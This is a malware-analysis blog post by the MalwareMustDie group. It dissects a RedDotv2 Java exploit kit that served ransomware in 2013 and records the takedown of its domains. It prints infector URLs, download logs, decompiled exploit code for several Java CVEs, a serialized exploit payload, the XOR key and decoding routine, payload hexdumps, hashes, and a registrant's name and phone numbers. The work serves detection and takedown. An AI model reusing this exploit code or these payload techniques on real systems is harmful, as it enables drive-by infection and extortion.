We had the active infectors is coming from the various urls as per below:
rootaliasx.biz/traff.html
dexthous.biz/traff.html
antestent.biz/hava.html
bastapils.biz/hava.html
bastapils.biz/traff.html
mzthtl.freewww.info/freeporn.html
ggooec.freewww.info/freeporn.html
ggooec.freewww.info/freeporn.html
zcmgiawwm.freewww.info/freeporn.html
asikdycf.wikaba.com/freeporn.html
hfncudbeu.wikaba.com/sextour.html
vjbgaz.freewww.info/freeporn.html
uekfnibe.wikaba.com/freeporn.html
bcmht.freewww.info/11111111.html
delphilol.biz/testo.html
xkshgc.wikaba.com/sextour.html
:
: (many more!)And we need to dismantle these domains ASAP. So everything was in a hurry since Friday is to come soon.
[NEW] Quoted #Tango Dismantling Report Sat Apr 6 01:54:29 JST 2013:
==========================================================================
DOMAIN NAMES A RECORD NS SERVERS SUSPENSION STATUS
--------------------------------------------------------------------------
rootaliasx.biz,, IP DOWN NORTH.INAPPLE.COM SUSPENSION IN PROCESS
SOUTH.INAPPLE.COM
WEST.INAPPLE.COM
EAST.INAPPLE.COM
dexthous.biz,, IP DOWN NORTH.INAPPLE.COM SUSPENSION IN PROCESS
SOUTH.INAPPLE.COM
WEST.INAPPLE.COM
EAST.INAPPLE.COM
antestent.biz,, IP DOWN NORTH.INAPPLE.COM SUSPENSION IN PROCESS
SOUTH.INAPPLE.COM
WEST.INAPPLE.COM
EAST.INAPPLE.COM
bastapils.biz,, IP DOWN NORTH.INAPPLE.COM SUSPENSION IN PROCESS
SOUTH.INAPPLE.COM
WEST.INAPPLE.COM
EAST.INAPPLE.COM
bastapils.biz,, IP DOWN NORTH.INAPPLE.COM SUSPENSION IN PROCESS
SOUTH.INAPPLE.COM
WEST.INAPPLE.COM
EAST.INAPPLE.COM
delphilol.biz,, IP DOWN NORTH.INAPPLE.COM SUSPENSION IN PROCESS
SOUTH.INAPPLE.COM
WEST.INAPPLE.COM
EAST.INAPPLE.COM
mzthtl.freewww.info,, IP DOWN DNS DOWN SUSPENSION COMPLETE!
ggooec.freewww.info,, IP DOWN DNS DOWN SUSPENSION COMPLETE!
zcmgiawwm.freewww.info,, IP DOWN DNS DOWN SUSPENSION COMPLETE!
asikdycf.wikaba.com,, IP DOWN DNS DOWN SUSPENSION COMPLETE!
hfncudbeu.wikaba.com,, IP DOWN DNS DOWN SUSPENSION COMPLETE!
vjbgaz.freewww.info,, IP DOWN DNS DOWN SUSPENSION COMPLETE!
uekfnibe.wikaba.com,, IP DOWN DNS DOWN SUSPENSION COMPLETE!
bcmht.freewww.info,, IP DOWN DNS DOWN SUSPENSION COMPLETE!
xkshgc.wikaba.com,, IP DOWN DNS DOWN SUSPENSION COMPLETE!
: : : :
It is an Exploit Kit with the panel below:
(* In the end we were informed by @kafaine it's a RedDorv2 Exploit Kit)
The landing page infector contains the HTML like:To understand the flow we must reverse it and to understand the decryption goes. We much think backward, start with the lower step of obfuscation and build things up. The most obfuscation is mainly using K.Class. @Cephurs was recognizing it right away with the ROT13 logic while I was so dumb to start on XOR parts (Thank's friend!)--2013-04-05 10:50:54-- h00p://rootaliasx.biz/traff.html Resolving rootaliasx.biz... seconds 0.00, 46.4.179.111 Caching rootaliasx.biz => 46.4.179.111 Connecting to rootaliasx.biz|46.4.179.111|:80... seconds 0.00, connected. GET /traff.html HTTP/1.0 Host: rootaliasx.biz Connection: Keep-Alive HTTP request sent, awaiting response... : HTTP/1.1 200 OK Server: nginx Date: Fri, 05 Apr 2013 05:20:55 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive X-Powered-By: PHP/5.3.23 Cache-Control: no-store, no-cache Expires: Fri, 05 Apr 2013 05:20:27 GMT Vary: Accept-Encoding,User-Agent Content-Length: 551 : 200 OK Length: 551 [text/html] Saving to: `traff.html' 2013-04-05 10:50:56 (36.4 MB/s) - `traff.html' saved [551/551]With the HTML code :As per coded it lead to the JAR file:
--2013-04-04 14:40:45-- h00p://rootaliasx.biz/traff.jar Resolving rootaliasx.biz... seconds 0.00, 46.4.179.111 Caching rootaliasx.biz => 46.4.179.111 Connecting to rootaliasx.biz|46.4.179.111|:80... seconds 0.00, connected. : GET /traff.jar HTTP/1.0 Host: rootaliasx.biz HTTP request sent, awaiting response... : HTTP/1.1 200 OK Server: nginx Date: Thu, 04 Apr 2013 09:10:45 GMT Content-Type: application/java-archive Connection: keep-alive X-Powered-By: PHP/5.3.23 Content-Disposition: attachment; filename="traff.jar" Content-Length: 63706 Cache-Control: no-store, no-cache Expires: Thu, 04 Apr 2013 09:10:17 GMT Vary: Accept-Encoding,User-Agent : 200 OK Length: 63706 (62K) [application/java-archive] Saving to: `traff.jar' 2013-04-04 14:40:53 (8.32 KB/s) - `traff.jar' saved [63706/63706]IP involved in the infection:↑All IPs are in HELZNER Germany Network. Under below registrant:
inetnum: 46.4.179.64 - 46.4.179.127 netname: VPSSERVER descr: vpsserver country: DE admin-c: VK1952-RIPE tech-c: VK1952-RIPE status: ASSIGNED PA mnt-by: HOS-GUN source: RIPE Filtered" person: Viacheslav Krivosheev address: vps-server address: Poliykovskaiy 8a address: 153011 IVANOVO address: RUSSIAN FEDERATION" phone: +79106677787 fax-no: +74932502950 nic-hdl: VK1952-RIPE mnt-by: HOS-GUN source: RIPE # FilteredJAR File Details: (Thanks to VT for the format)
SHA1: f8e433a2190017d9bd866374d6adfc124409e83e MD5: 8a928628fa5d3e43db4ca1ae6d0213b6 File size: 62.2 KB ( 63705 bytes ) File name: traff.jar File type: JARSome pcaps..& more evidence:
Is the multiple class of Java archive executable, contains embedded object.
The traff.jar classes is having components as follows:
I: System environment sniffer C: The main class to be called from landing page D: Contains hidden W.class and XOR logic with its key K: String translation + cascaded with char rotator logic obfuscatoin S: Embedded object extractor logic, used same key as XOR A: Has some exploit methods/codes with some obfuscation. TRAFF: An embedded object trailed at the bottom (in HEX)
To make it simple it was rotating the chars with below logic in Java:Varied of exploitation methods and code detected, mainly is aimed the abuse of getMethod invoke(), combined with loading JmxMBeanServer's components. It is aiming for Java version 1.7. I tried to infect myself with 1.6.x and ended up with crash:public static String rot13(String paramString) { String str = ""; int i = 13; for (int j = 0; j < paramString.length(); j++) { char c = paramString.charAt(j); if ((c >= 'a') && (c <= 'm')) c = (char)(c + i); else if ((c >= 'A') && (c <= 'M')) c = (char)(c + i); else if ((c >= 'n') && (c <= 'z')) c = (char)(c - i); else if ((c >= 'N') && (c <= 'Z')) c = (char)(c - i); str = str + c; } return str; }Which is resulting in rotation character below:ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklmAnd all of the strings in K.Class can be converted into below table:wnin.frphevgl.preg.Pregvsvpngr java.security.cert.Certificate wnin.frphevgl.PbqrFbhepr java.security.CodeSource wnin.frphevgl.Crezvffvbaf java.security.Permissions svyr: file: frg set fha.bet.zbmvyyn.wninfpevcg.vagreany.Pbagrkg sun.org.mozilla.javascript.internal.Context pbz.fha.wzk.zornafreire.ZOrnaVafgnagvngbe com.sun.jmx.mbeanserver.MBeanInstantiator H U cbejAXOIiDNOD porwNKBVvQABQ 1.7 1.7 wnin.vb.gzcqve java.io.tmpdir svaqPynff findClass jimVfWd.rkr wvzIsJq.exe bf.anzr os.name wnink.znantrzrag.ZOrnaFreire javax.management.MBeanServer cbejAXOIiDNOD porwNKBVvQABQ arjZOrnaFreire newMBeanServer pbz.fha.wzk.zornafreire.Vagebfcrpgbe com.sun.jmx.mbeanserver.Introspector Jvaqbjf Windows wnin.vb.gzcqve java.io.tmpdir wnin.frphevgl.NyyCrezvffvba java.security.AllPermission wnink.znantrzrag.ZOrnaFreireQryrtngr javax.management.MBeanServerDelegate I V C P tnzr.J game.W ryrzragSebzPbzcyrk elementFromComplex cbejAXOIiDNOD porwNKBVvQABQ wnin.frphevgl.CebgrpgvbaQbznva java.security.ProtectionDomain GGSPg.rkr TTFCt.exe fha.bet.zbmvyyn.wninfpevcg.vagreany.TrarengrqPynffYbnqre sun.org.mozilla.javascript.internal.GeneratedClassLoader wnin.frphevgl.CrezvffvbaPbyyrpgvba java.security.PermissionCollection wnin.irefvba java.version pbz.fha.wzk.zornafreire.WzkZOrnaFreire com.sun.jmx.mbeanserver.JmxMBeanServer trgZOrnaVafgnagvngbe getMBeanInstantiator nqq add nprq0005757200135o4p6n6176612r6p616r672r4s626n6563743o90pr aced0005757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c020000787000000002757200095b4c67616d652e413bfe2c941188b6e5ff02000078700000000170737200306a6176612e7574696c2e636f6e63757272656e742e61746f6d69632e41746f6d69635265666572656e63654172726179a9d2dea1be65600c0200015b000561727261797400135b4c6a6176612f6c616e672f4f626a6563743b787071007e0003 cbejAXOIiDNOD porwNKBVvQABQ qrpynerqZrgubqf declaredMethods wnin.frphevgl.Crezvffvba java.security.PermissionFor the table picture is here:See the long var "aced...blah blah" string? Is actually a Java class with the insides is CVE-2012-0507 code↓
0000 AC ED 00 05 75 72 00 13 5B 4C 6A 61 76 61 2E 6C ....ur..[Ljava.l 0010 61 6E 67 2E 4F 62 6A 65 63 74 3B 90 CE 58 9F 10 ang.Object;..X.. 0020 73 29 6C 02 00 00 78 70 00 00 00 02 75 72 00 09 s)l...xp....ur.. 0030 5B 4C 67 61 6D 65 2E 41 3B FE 2C 94 11 88 B6 E5 [Lgame.A;.,..... 0040 FF 02 00 00 78 70 00 00 00 01 70 73 72 00 30 6A ....xp....psr.0j 0050 61 76 61 2E 75 74 69 6C 2E 63 6F 6E 63 75 72 72 ava.util.concurr 0060 65 6E 74 2E 61 74 6F 6D 69 63 2E 41 74 6F 6D 69 ent.atomic.Atomi 0070 63 52 65 66 65 72 65 6E 63 65 41 72 72 61 79 A9 cReferenceArray. 0080 D2 DE A1 BE 65 60 0C 02 00 01 5B 00 05 61 72 72 ....e`....[..arr 0090 61 79 74 00 13 5B 4C 6A 61 76 61 2F 6C 61 6E 67 ayt..[Ljava/lang 00A0 2F 4F 62 6A 65 63 74 3B 78 70 71 00 7E 00 03 /Object;xpq.~..OK, we got the table. What's next?Unlocked encoding logic
Put all K.class vars in the rest of the classes variables & that will make you understand the exploitation use completely: In I class it detects OS Name and Java Versions:(9): String str1 = System.getProperty(K.BvKs70); /// System.getProperty(os.name); (24): String str8 = System.getProperty(K.sATQ); /// System.getProperty(java.version); (32): String str10 = getParameter(K.JgUQEqm); /// getParameter(U); (40): String str14 = getParameter(K.HS0g); /// getParameter(V); And also IMPORTANT condition of infection (main windows + Java >= 1.7) (58): (str1.indexOf(K.jp1jj) >= 0) // if (str1.indexOf(Windows) >= 0) (83): if (str8.startsWith(K.adxAi3j)) // if (str8.startsWith(1.7))In A class :(27): URL localURL = new URL(K.F5vzTsGa + "//"); → URL localURL = new URL("file:" + "//"); (43): Class localClass1 = Class.forName(K.zDCn9Y); → Class localClass1 = Class.forName("java.security.cert.Certificate"); (68): Class localClass2 = Class.forName(K.dy3rkh); → Class localClass2 = Class.forName("java.security.Permissions"); (86): Class localClass3 = Class.forName(K.hkhQ5O); → Class localClass3 = Class.forName("java.security.Permissions"); (98): Method localMethod = localClass2.getMethod(K.Url1a, new Class[] { localClass3 }); → K.Url1a == "add" (100): localMethod.invoke(localObject2, new Object[] { Class.forName(K.ZklLSir).newInstance() }); → K.ZklLSir == "java.security.AllPermission" (113): Class localClass4 = Class.forName(K.tmc3I); → "java.security.ProtectionDomain" (117): Class localClass5 = Class.forName(K.SNku); → "java.security.Permissions" (133): Class localClass6 = Class.forName(K.uKIX_p); → "java.security.PermissionCollection" (195): Class localClass7 = paramA.defineClass(K.Jb928E, D.decoded, 0, i104, (ProtectionDomain)localObject4); // "game.W" (211): String str49 = System.getProperty(K.p6BEDfqv); → "java.io.tmpdir" (218): String str51 = "\\" + K.JuUKXjj; → "TTFCt.exe" (263): localConstructor3.newInstance(new Object[] { paramString1, paramString2, paramString3, "0", str49 + str51, S.class.getClassLoader().getResourceAsStream(paramString3), K.PH8cd4 }); → "porwNKBVvQABQ"In C Class:(73): ObjectInputStream localObjectInputStream = new ObjectInputStream(new ByteArrayInputStream(X(K.TvUD3yH4)));↑This will getting the binary stream CVE-2012-0507 to be loaded. because the :K.TvUD3yH4 = "aced000575...(snipped)...f626a6563743b787"And..(96): localObject[1].getClass().getMethod(K.I4VwpS8, new Class[] { Integer.TYPE, Object.class }).invoke(localObject[1], new Object[] { Integer.valueOf(0), getClass().getClassLoader() }); → K.I4VwpS8 == "set"This is the abuse of the getMethod of - java.lang.reflect.Method invoke() method CVE-2012-4820 In the K Class, let's see what bad actors tried to hide: javax.management.MBeanServer was imported as per encoded:(128): public static String uuIj = new String(rot13("wnink.znantrzrag.ZOrnaFreire")); (301): public static String ZyZhnh5a = new String(rot13("pbz.fha.wzk.zornafreire.WzkZOrnaFreire"));com.sun.jmx.mbeanserver.Introspector was imported as per encoded:(62): public static String Qj7BnL = new String(rot13("pbz.fha.wzk.zornafreire.ZOrnaVafgnagvngbe")); (148): public static String dradg2 = new String(rot13("pbz.fha.wzk.zornafreire.Vagebfcrpgbe"));and javax.management.MBeanServerDelegate:(182): public static String i_fJGSy = new String(rot13("wnink.znantrzrag.ZOrnaFreireQryrtngr"));In the S class was written:(14): Class localClass = Class.forName(K.dradg2); // Class localClass = Class.forName(com.sun.jmx.mbeanserver.Introspector); (17): Method localMethod1 = localClass.getMethod(K.vpAhSF, new Class[] { Object.class, String.class }); (20): Method[] arrayOfMethod1 = (Method[])(Method[])localMethod1.invoke(null, new Object[] { paramObject, K.uATab_ }); (103): Class localClass1 = Class.forName(K.ZyZhnh5a); (118): Method localMethod1 = localClass1.getMethod(K.CqAw, new Class[] { String.class, Class.forName(K.uuIj), Class.forName(K.i_fJGSy), Boolean.TYPE }); (139): Class localClass2 = Class.forName(K.Qj7BnL); (149): Method localMethod2 = localClass1.getMethod(K.n7tOG, new Class[0]); (173): Method localMethod3 = localClass2.getMethod(K.lKCeXn, new Class[] { String.class, ClassLoader.class }); (188): Class localClass1 = fItgag(K.Mg7ws1); (226): Class localClass2 = fItgag(K.YoILBY); (262): String str27 = System.getProperty(K.aPd5); (269): String str30 = "\\" + K.H95l4; (311): localConstructor.newInstance(new Object[] { paramString1, paramString2, paramString3, "1", str27 + str30, S.class.getClassLoader().getResourceAsStream(paramString3), K.F8pYg2tfr });which is actually means:(14): Class localClass = Class.forName(com.sun.jmx.mbeanserver.Introspector); (17): Method localMethod1 = localClass.getMethod(elementFromComplex, new Class[] { Object.class, String.class }); (20): Method[] arrayOfMethod1 = (Method[])(Method[])localMethod1.invoke(null, new Object[] { paramObject, declaredMethods }); (103): Class localClass1 = Class.forName(com.sun.jmx.mbeanserver.JmxMBeanServer); (118): Method localMethod1 = localClass1.getMethod(K.CqAw, new Class[] { String.class, Class.forName(K.uuIj), Class.forName(javax.management.MBeanServerDelegate), Boolean.TYPE }); (139): Class localClass2 = Class.forName(com.sun.jmx.mbeanserver.Introspector); (149): Method localMethod2 = localClass1.getMethod(getMBeanInstantiator, new Class[0]); (173): Method localMethod3 = localClass2.getMethod(findClass, new Class[] { String.class, ClassLoader.class }); (188): Class localClass1 = fItgag(sun.org.mozilla.javascript.internal.Context); (226): Class localClass2 = fItgag(sun.org.mozilla.javascript.internal.GeneratedClassLoade); (262): String str27 = System.getProperty(java.io.tmpdir); (269): String str30 = "\\" + "wvzIsJq.exe"; (311): localConstructor.newInstance(new Object[] { paramString1, paramString2, paramString3, "1", str27 + str30, S.class.getClassLoader().getResourceAsStream(paramString3), porwNKBVvQABQ });OK, we have all codes decoded, we can read all codes now! Good, first let's see if we can recognize the exploitation used..Exploitation
This case is interesting. Because we see two ways gain the payload here, just grep the .exe in the above decoded classes code and you'll get:Shortly. These are the list of exploitation(CVE/CWE) method I can spot:
CVE-2012-4820: java.lang.reflect.Method invoke() method CWE-578: EJB Bad Practices use of Class Loader CVE-2012-0507 Java AtomicReferenceArray Type Violation CVE-2013-0431 Getting access to restricted classes (via com.sun.jmx.mbeanserver.MBeanInstantiator)Payload
A.class with payload: "TTFCt.exe" S.class with the payload: "wvzIsJq.exe"
First route to payload...
Payload was coded to be defined by the below code as a class. Is it really a class?
Class localClass7 = paramA.defineClass("game.W",
D.decoded, 0, i104,
(ProtectionDomain)localObject4);
Which is the Game.W doesn't exist in the classes list!
So there is a hidden class in D.Class with"decoded"function.
:-) ↓We can see the decoded XOR key used...
public static byte[] decoded = XorDecrypt(encoded, "porwNKBVvQABQ");。。to decrypt this array in D Class.. (Which I assumed it was an encoded shellcode in quick analysis)
public static byte[] encoded = { -70, -111, -..
.., 35, 89, 65, 20, 86, 112, 56, 120, 119, 22, ..
..5, 89, 81, 58, 101, 114, 84, 78, 1, 69, 86, 6..
... 29, 47, 61, 35, 121, 31, 62, 110, 11, 63, 0,..
...3, 48, 56, 30, 8, 73, 94, 2, 33, 35, 32, 23, ..
... 0, 48, 110, 46, 48, 30, 8, 93, 36, 58, 57, 4..
..., 16, 97, 24, 54, 36, 31, 63, 38, 121, 120, 3..
...4, 80, 65, 90, 59, 17, 25, 19, 88, 39, 36, 10..
... 112, -24, 114, -2, 66, 75, -56, 86, -3, 80, ..
To make it clear.. a pic :-)↓
↑This Array was loaded by the below loading-logic loops:
public static byte[] XorDecrypt(byte[] paramArrayOfByte, String paramString)
{ int i = 0; for (int j = 0; i < paramArrayOfByte.length; j = (j + 1) % paramString.length())
{ int tmp12_11 = i; paramArrayOfByte[tmp12_11] = (byte)(paramArrayOfByte[tmp12_11]
^ paramString.charAt(j));
Into paramArrayOfByte to be soted in to localObject4,
which having definition object below: (trailed it↓)
↓localObject4 = localConstructor1.newInstance(new Object[] { localObject3, localObject2 });
↓localObject3 = localConstructor2.newInstance(new Object[] { localURL, localObject1 });
↓localObject2 = localMethod1.invoke(null, new Object[] { "", null, null, Boolean.valueOf(true) });
localObject1 = Array.newInstance(localClass1, 0)
↑Yes, the code will treat the object as a Java class after you XOR the array.
This class will extract TRAFF embedded file & save it with file://TTFCt.exe.
While I was on decoding the vars , Daryll of Kahu Security was successfully extracted this 1st. :-) So you'd better also read Kahu Security good post about extracting EXE payload file saved from this. Here is the Kahu Security post's link-->>[HERE]
:-))) OK. End of the first method.
Second route to payload, a bypass :-)This is the second route of getting the binary payload. Let's see it further, now, what is inside of the TRAFF embedded object? A binary? Another Class?
We detected 31KB Object "traff" is a encoded exe embedded in jar:
-rwxr--r-- 1 MMD toor 31232 Apr 3 22:44 "traff"*looks like this encoded data:
0000 3D 35 F2 77 4F 4B 42 56 72 51 51 42 AE 8F 6F 72 =5.wOKBVrQQB..or
0010 37 4F 4B 42 56 76 51 41 02 51 70 6F 72 77 4E 4B 7OKBVvQA.QporwNK
0020 42 56 76 51 41 42 51 70 6F 72 77 4E 4B 42 56 76 BVvQABQporwNKBVv
0030 51 41 42 51 70 6F 72 77 4E 4B 42 56 F6 51 41 42 QABQporwNKBV.QAB
0040 5F 6F D5 7C 77 FA 42 8F 77 CE 50 0D 8F 70 24 07 _o.|w.B.w.P..p$.
0050 1B 04 6E 3B 30 39 11 23 20 2F 71 13 0E 1C 19 21 ..n;09.# /q....!
0060 3F 62 34 13 71 33 37 3F 50 06 1C 57 0A 04 11 76 ?b4.q37?P..W...v
0070 1B 3E 25 27 7F 7D 65 56 77 4E 4B 42 56 76 51 41 .>%'.}eVwNKBVvQA
0080 12 14 70 6F 3E 76 4B 4B 45 62 2A 00 41 42 51 70 ..po>vKKEb*.ABQp
0090 6F 72 77 4E AB 42 58 77 5A 40 43 16 70 6D 72 77 orwN.BXwZ@C.pmrw
: : :
7820 05 46 08 71 27 61 F1 5F F4 47 C0 7B D5 66 E9 61 .F.q’a._.G.{.f.a
7830 E4 72 E1 40 D9 42 C8 7E 8E 72 9C 46 81 71 98 61 .r.@.B.~.r.F.q.a
7840 99 5F 64 46 7D 7A 1D 67 08 60 C6 73 F7 41 D9 43 ._dF}z.g.’.s.A.C
7850 92 7F A6 73 56 76 51 41 42 51 70 6F 72 77 4E 4B ...sVvQABQporwNK
7860 42 56 76 51 41 42 51 70 6F 72 77 4E 4B 42 56 76 BVvQABQporwNKBVv
7870 51 41 42 51 70 6F 72 77 4E 4B 42 56 76 51 41 42 QABQporwNKBVvQAB
7880 51 70 6F 72 77 4E 4B 42 56 76 51 41 42 51 70 6F QporwNKBVvQABQpo
: : :
7990 42 51 70 6F 72 77 4E 4B 42 56 76 51 41 42 51 70 BQporwNKBVvQABQp
79A0 6F 72 77 4E 4B 42 56 76 51 41 42 51 70 6F 72 77 orwNKBVvQABQporw
79B0 4E 4B 42 56 76 51 41 42 51 70 6F 72 77 4E 4B 42 NKBVvQABQporwNKB
79C0 56 76 51 41 42 51 70 6F 72 77 4E 4B 42 56 76 51 VvQABQporwNKBVvQ
79D0 41 42 51 70 6F 72 77 4E 4B 42 56 76 51 41 42 51 ABQporwNKBVvQABQ
79E0 70 6F 72 77 4E 4B 42 56 76 51 41 42 51 70 6F 72 porwNKBVvQABQpor
79F0 77 4E 4B 42 56 76 51 41 42 51 70 6F 72 77 4E 4B wNKBVvQABQporwNK
To be clear.. a Pic :-)↓
↑Can you see the XOR pattern? :D
Yes, but we should confirm XOR key which is supposed in the hidden W.class..back to the the D.class...
But wait!! there is another clue! In the decoded code in S.Class, it was mentioned "again":
localClass3 = (Class)localMethod3.invoke(localObject2, new Object[] { null, D.decoded });
If we trail it further we found that the same XOR key"porwNKBVvQABQ" is used.
Strange! This is suggesting the automation scheme in this Exploit Kit in obfuscating any of the payload embedded with XOR. See the XOR key in the end of string below↓
(311): localConstructor.newInstance(new Object[] { paramString1, paramString2, paramString3, "1", str27 + str30, S.class.getClassLoader().getResourceAsStream(paramString3), porwNKBVvQABQ });
Traced it more to come up with loading of new object to drop a file:
str27 = System.getProperty(java.io.tmpdir); str30 = "\\" + "wvzIsJq.exe";So this could be it, jumped to FreeBSD shell to XOR the TRAFF "porwNKBVvQABQ" key
$ myxorwraper.py -l 13 -k porwNKBVvQABQ ./traff ./20130405100541.out $ ls -alF 20130405100541.out "-rwxr--r-- 1 xxx xxx 31232 Apr 5 19:06 20130405100541.out*"That's the XOR result. ↓Here's that PE Infor:
Exif++: MIMEType : application/octet-stream Subsystem : Windows GUI MachineType : Intel 386 or later, and compatibles TimeStamp : 2013:04:03 14:52:07+01:00 CompileTime : 2013-04-03 13:52:07 FileType : Win32 EXE PEType : PE32 CodeSize : 512 LinkerVersion : 1.71 InitializedDataSize : 29696 SubsystemVersion : 4.0 ImageVersion : 0.0 OSVersion : 1.0 UninitializedDataSize : 0 Sections: .code 0x1000 0x1fa 512 .data 0x2000 0x6d3c 28160 .edata 0x9000 0x50 512 .idata 0xa000 0x1d4 512 .reloc 0xb000 0x54 512 Entry Point at 0x400 Virtual Address is 0x401000 : 0000 4D 5A 80 00 01 00 00 00 04 00 10 00 FF FF 00 00 MZ.............. 0010 40 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 @.......@....... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................ 0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th 0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno 0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS 0070 6D 6F 64 65 2E 0D 0A 24 00 00 00 00 00 00 00 00 mode...$........ 0080 50 45 00 00 4C 01 05 00 07 34 5C 51 00 00 00 00 PE..L....4.Q....Looks like I bumped into @rjacksix's uploaded sample in VT ;-) URL-->>[HERE]
SHA256: bab60825b4e25ecbe42981514b3854451eeb542b2bf7efdf65c1dac1d1b47b2d SHA1: 8c9f66d79f2b798cc655612af41d51ed53c9f222 MD5: 2a933a291f92e2a257c5cb0875b227a2 File size: 30.5 KB ( 31232 bytes ) File name: 2a933a291f92e2a257c5cb0875b227a2.exe File type: Win32 EXE Tags: peexe Detection ratio: 5 / 46 Analysis date: 2013-04-04 17:06:37 UTC ( 17 hours, 6 minutes ago ) Malware names; Panda : Trj/Dtcontx.C Symantec : WS.Reputation.1 CAT-QuickHeal : (Suspicious) - DNAScan Kaspersky : Trojan-Ransom.Win32.Foreign.bdjg Microsoft : Trojan:Win32/Urausy.D↑here we are, a Ransomware. See tweet by @nyxbone:
Please block all url and of the IP mentioned above.@malwaremustdie I found this LockScreen in a lot of .ru domains with IPs 134.0.116.18, 62.122.213.10, 77.246.149.33 twitter.com/nyxbone/status…
— Mosh (@nyxbone) April 5, 2013
In my test cases before infecting & crash my PC is sent DNS request to the host below:
↑It requesting A record to callback to domain testodrom.biz
you can see right before crash the malform packet was generated..
If you got infected by this ransomware you'll find these files in %AppData% and some changes in registry pointing autostart of these "AltShell". These are the self-copied of the payload, and to be executed by shell environment.
Kudoz! MalwareMustDie Team!
#MalwareMustDie MOAR Ransomware at 46.4.179.118 (thx:@nyxbone) pastebin.com/raw.php?i=SpaJ… VT=2/46 virustotal.com/en/file/cc7d71… twitter.com/MalwareMustDie…
— Malware Crusaders (@MalwareMustDie) April 7, 2013
@malwaremustdie wt4n6.com/CuckooResults/…
— Robin Jackson (@rjacksix) April 5, 2013
Quick note to "wack" the bins...
Oh MAI.. blocked by pastebin "AGAIN"... (why me.. why now..why!!!) #crusadeistough
— Malware Crusaders (@MalwareMustDie) April 4, 2013
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzNOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm
— WT4N6 (@Cephurs) April 4, 2013
@malwaremustdie good work friends . expect a #tangodown its gonna be huge
— sachin (@essachin) April 4, 2013
Thank's to @kafeine for informing EK info;@malwaremustdie @cephurs Looking at the encoded and decoded java, I assume there was a "letter-shifting" cipher involved? (e.g: A->C, B->D)
— Donovan Glover (@GloverDonovan) April 5, 2013
@malwaremustdie twitter.com/kafeine/status…Seems to share a huge amount of things with RedDot.Not knowing we @ekwatcher @node5use Reddotv2
— kafeine (@kafeine) April 5, 2013
The quick analysis I made is linked here-->>[HERE]
(Used Google drive because pastebin blocked me "again" somehow)
I realized that the-2hours-made quick (halfway) analysis information is incorrect and rough in some points, so please refer to this post for the valid information, with thank you for be patient with us solving difficult case.
Samples
We shared the samples for the research & raising detection ratio:
Download is here-->>[HERE]
#MalwareMustDie!
